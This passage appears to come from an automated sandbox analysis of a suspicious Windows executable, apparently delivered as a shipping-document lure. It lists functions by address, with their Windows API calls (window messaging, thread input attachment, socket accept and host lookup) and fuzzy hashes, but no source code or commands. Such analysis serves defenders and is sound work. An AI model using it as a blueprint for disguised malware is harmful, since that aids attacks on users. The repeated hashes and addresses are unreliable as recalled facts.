                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                              • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                              • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                              • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                              Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                              Download Yara Rule
                              APIs
                              • GetParent.USER32(?), ref: 004503C8
                              • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                              • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                              • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Proc$Parent
                              • String ID:
                              • API String ID: 2351499541-0
                              • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                              • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                              • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                              • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                              Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                              Download Yara Rule
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                              • TranslateMessage.USER32(?), ref: 00442B01
                              • DispatchMessageW.USER32(?), ref: 00442B0B
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchTranslate
                              • String ID:
                              • API String ID: 1795658109-0
                              • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                              • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                              • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                              • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                              Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                              • GetCaretPos.USER32(?), ref: 004743B2
                              • ClientToScreen.USER32(00000000,?), ref: 004743E8
                              • GetForegroundWindow.USER32 ref: 004743EE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                              • String ID:
                              • API String ID: 2759813231-0
                              • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                              • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                              • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                              • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                              Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                              • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                              • _wcslen.LIBCMT ref: 00449519
                              • _wcslen.LIBCMT ref: 00449526
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend_wcslen$_wcspbrk
                              • String ID:
                              • API String ID: 2886238975-0
                              • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                              • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                              • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                              • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                              Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __setmode$DebugOutputString_fprintf
                              • String ID:
                              • API String ID: 1792727568-0
                              • Opcode ID: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                              • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                              • Opcode Fuzzy Hash: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                              • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                              Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$Long$AttributesLayered
                              • String ID:
                              • API String ID: 2169480361-0
                              • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                              • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                              • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                              • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                              Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                              • lstrlenW.KERNEL32(?), ref: 00434CF6
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                              • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: lstrcmpilstrcpylstrlen$_malloc
                              • String ID: cdecl
                              • API String ID: 3850814276-3896280584
                              • Opcode ID: 5248fcd12fa573e8471e03ef3ffe1589e610c1ecd3e4c73a3bae80ffd9d943a4
                              • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                              • Opcode Fuzzy Hash: 5248fcd12fa573e8471e03ef3ffe1589e610c1ecd3e4c73a3bae80ffd9d943a4
                              • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                              Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                              • gethostbyname.WSOCK32(?), ref: 0046D42D
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                              • _memmove.LIBCMT ref: 0046D475
                              • inet_ntoa.WSOCK32(?), ref: 0046D481
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                              • String ID:
                              • API String ID: 2502553879-0
                              • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                              • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                              • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                              • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                              Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32 ref: 00448C69
                              • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow
                              • String ID:
                              • API String ID: 312131281-0
                              • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                              • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                              • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                              • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                              Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                              Download Yara Rule
                              APIs
                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                              • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorLastacceptselect
                              • String ID:
                              • API String ID: 385091864-0
                              • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                              • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                              • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                              • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                              Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                              • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                              • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                              • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                              Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                              Download Yara Rule
                              APIs
                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                              • GetStockObject.GDI32(00000011), ref: 00430258
                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                              • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$CreateMessageObjectSendShowStock
                              • String ID:
                              • API String ID: 1358664141-0
                              • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                              • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                              • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                              • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                              Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                              • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                              • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                              • String ID:
                              • API String ID: 2880819207-0
                              • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                              • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                              • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                              • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                              Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                              Download Yara Rule
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00430BA2
                              • ScreenToClient.USER32(?,?), ref: 00430BC1
                              • ScreenToClient.USER32(?,?), ref: 00430BE2
                              • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ClientRectScreen$InvalidateWindow
                              • String ID:
                              • API String ID: 357397906-0
                              • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                              • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                              • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                              • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                              Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              • __wsplitpath.LIBCMT ref: 0043392E
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • __wsplitpath.LIBCMT ref: 00433950
                              • __wcsicoll.LIBCMT ref: 00433974
                              • __wcsicoll.LIBCMT ref: 0043398A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
